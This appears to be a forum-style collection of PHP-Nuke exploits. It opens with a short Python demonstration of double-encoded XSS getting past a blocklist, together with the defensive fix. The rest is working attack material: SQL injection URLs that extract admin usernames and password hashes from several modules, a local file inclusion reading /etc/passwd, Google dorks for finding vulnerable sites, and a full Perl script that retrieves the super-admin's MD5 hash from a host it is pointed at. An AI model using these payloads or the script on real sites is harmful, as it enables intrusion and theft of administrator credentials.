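An added example, not code from gibson's post or from PHP-Nuke, for the remark above that the GET vectors only work "with encoding" and for the %253c payloads in the XSS list earlier on the page: a blocklist filter that looks at the value as it arrives (decoded once, as $_GET is) passes the double-encoded Reviews payload, while a later code path that urldecodes the value again turns it back into a live <script> tag. The strict variant decodes to a fixed point before filtering, and the sink HTML-escapes regardless. The token list and the "decodes again" stage are assumptions standing in for whatever filter and sink a given site had; the payload is the one from the Reviews "text" vector.

```python
import html
from urllib.parse import unquote

# Payload from the Reviews vector above (the "text" parameter): '<' and '('
# are sent as %253c and %2528, i.e. the '%' itself is encoded once more.
PAYLOAD = "f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar"

# Assumed blocklist for the demonstration; real filters of the period were similar.
BAD_TOKENS = ("<script", "<iframe", "javascript:", "onload=", "onerror=")


def get_param(raw):
    """What the application sees in $_GET: the raw query value decoded once."""
    return unquote(raw)


def naive_filter_blocks(value):
    """Blocklist filter run on the once-decoded value."""
    v = value.lower()
    return any(tok in v for tok in BAD_TOKENS)


def app_decodes_again(value):
    """A code path that urldecodes a request value a second time (assumed here;
    it is the behaviour the %25-prefixed PoCs above depend on)."""
    return unquote(value)


def canonicalize(value, max_rounds=5):
    """Decode until the value stops changing, so the filter sees what the
    sink will see. Bounded so a pathological input cannot loop forever."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def strict_filter_blocks(value):
    """Same blocklist, applied to the canonical (fully decoded) form."""
    return naive_filter_blocks(canonicalize(value))


def safe_output(value):
    """Output encoding at the sink: this is what actually prevents the XSS,
    whichever tokens the blocklist happens to know."""
    return html.escape(canonicalize(value), quote=True)


if __name__ == "__main__":
    once = get_param(PAYLOAD)
    print("filter sees  :", once)
    print("naive blocks :", naive_filter_blocks(once))
    print("sink gets    :", app_decodes_again(once))
    print("strict blocks:", strict_filter_blocks(once))
    print("escaped      :", safe_output(once))
```

Canonicalizing before the blocklist closes the double-encoding gap, but the list of vectors on this page (body onload, img onerror, javascript: URLs) shows why a blocklist alone is never enough: escape at the output instead.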
PHP-Nuke Copyright 2005 SQL

Exploit:
Code:
-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1
modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1

Google dork:
Code:
allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi"
allinurl:"gaestebuch_v22&func"
PHP-Nuke Module eGallery "pid" Remote SQL Injection

PoC:
Code:
modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

PHP-Nuke Module "seminar" Local File Inclusion

PoC:
Code:
modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../../etc/passwd

Google dork:
Code:
inurl:"modules.php?name=seminar"

Regards, The-0utl4w
PHP-Nuke KutubiSitte "kid" SQL Injection

Exploit:
Code:
#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;
use LWP::UserAgent;

my ($host, $path, $user_id, %args);

sub usg {
    print "
 -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
 |    PHP-NUKE KutubiSitte [kid] => SQL Injection    |
 -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
 #######################################################
 # Bug by Lovebug  Exploit-Code by r080cy90r from RBT-4 #
 #######################################################
 USAGE:
   exploit.pl -h [Hostname] -p [Path] -U [User_Id]
 EXAMPLE:
   exploit.pl -h http://site.com -p /php-nuke/ -U 1
";
}

sub problem {
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";   # \"site not vulnerable\"
    exit();
}

sub exploitation {
    my $conn = LWP::UserAgent->new;
    $conn->agent('Checkbot/0.4 ');
    # -U is substituted into \"WHERE radminsuper=<U>\", so 1 selects the super admin
    my $query_pwd = $host . $path
        . "modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D"
        . $user_id . "%2F%2A";
    my $return_pwd = $conn->get($query_pwd);
    # get() always returns a response object, so the HTTP status must be checked explicitly
    problem() unless $return_pwd->is_success;
    $return_pwd->content() =~ /([0-9a-f]{32})/ || problem();
    print "\n [~] Admin Password (md5) for radminsuper=$user_id is: $1 [~]\n\n";
}

getopts(":h:p:U:", \%args);
$host    = $args{h} if (defined $args{h});
$path    = $args{p} if (defined $args{p});
$user_id = $args{U} if (defined $args{U});

if (!defined $args{h} || !defined $args{p} || !defined $args{U}) {
    usg();
} else {
    exploitation();
}

Bug found by Lovebug
Exploit coded by r080cy90r from RBT-4
PHP-Nuke SQL injection Module "Hadith" [cat]

SQL Injection
Exploit:
Code:
modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Found by Lovebug [rbt-4]
PHP-Nuke Module NukeC30 sql injection

SQL Injection
Vulnerable: Version 3.0
Exploit:
Code:
http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2

Found by HouSSaMix from H-T Team
PHP-Nuke Module ZClassifieds [cat] SQL Injection

SQL Injection
Vulnerable: Module ZClassifieds
Exploit:
Code:
modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**

...thx Lovebug...